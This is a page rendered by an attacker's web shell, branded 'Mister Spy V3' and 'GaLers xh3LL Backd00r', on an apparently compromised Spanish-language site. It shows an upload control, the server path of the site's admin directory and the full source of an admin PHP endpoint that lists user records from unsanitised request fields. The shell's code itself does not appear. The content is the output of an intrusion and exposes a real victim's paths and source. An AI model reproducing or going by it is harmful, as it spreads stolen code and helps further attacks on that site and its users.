Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/admin/
Upload File :
Current File : /home/caballoscriollos/public_html/web/admin/json-usuarios.php

<?php 
error_reporting(E_ERROR | E_PARSE);
session_cache_limiter('private-no-cache');
session_cache_expire(500);

ob_start();
session_start();

require_once('../library/class.usuarios.php'); 

/* obtenemos datos enviados */
$filter = array();
$filter['IdTipoUsuario']	= trim($_REQUEST['IdTipoUsuario']);
$filter['Apellido']			= trim($_REQUEST['Apellido']);
$filter['Nombre']			= trim($_REQUEST['Nombre']);
$filter['Email']			= trim($_REQUEST['Email']);
$filter['Fax']				= trim($_REQUEST['Fax']);
$filter['Dni']				= trim($_REQUEST['Dni']);
$filter['Telefono']			= trim($_REQUEST['Telefono']);
$filter['IdAdministrador']	= $_SESSION['IdUsuario'];
$filter['IdEstado']			= intval($_REQUEST['IdEstado']);
$Page 						= intval($_REQUEST['pageIndex']);
$PageSize					= intval($_REQUEST['pageSize']);

/* declaramos e instanciamos variables necesarias */
$arrData 		= array();
$oUsuarios 	= new Usuarios();
$oPage 			= new Page($Page, $PageSize);

$arrData = $oUsuarios->GetAll($filter, $oPage);
$count = $oUsuarios->GetCountRows($filter);

if ($arrData)
{
	foreach ($arrData as $oUsuario)
	{
		$oUsuario->Nombre 	= utf8_encode($oUsuario->Nombre);
		$oUsuario->Apellido 	= utf8_encode($oUsuario->Apellido);
		$oUsuario->IdEstado	= intval($oUsuario->IdEstado);
		$oUsuario->Fax		= utf8_encode($oUsuario->CodigoAreaFax . ' ' . $oUsuario->Fax);
		$oUsuario->Telefono	= utf8_encode($oUsuario->CodigoAreaTelefono . ' ' . $oUsuario->Telefono);
	}
}

$arrResult = array("data" => $arrData, "itemsCount" => $count);

header('Content-type: application/json');
echo json_encode($arrResult);

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat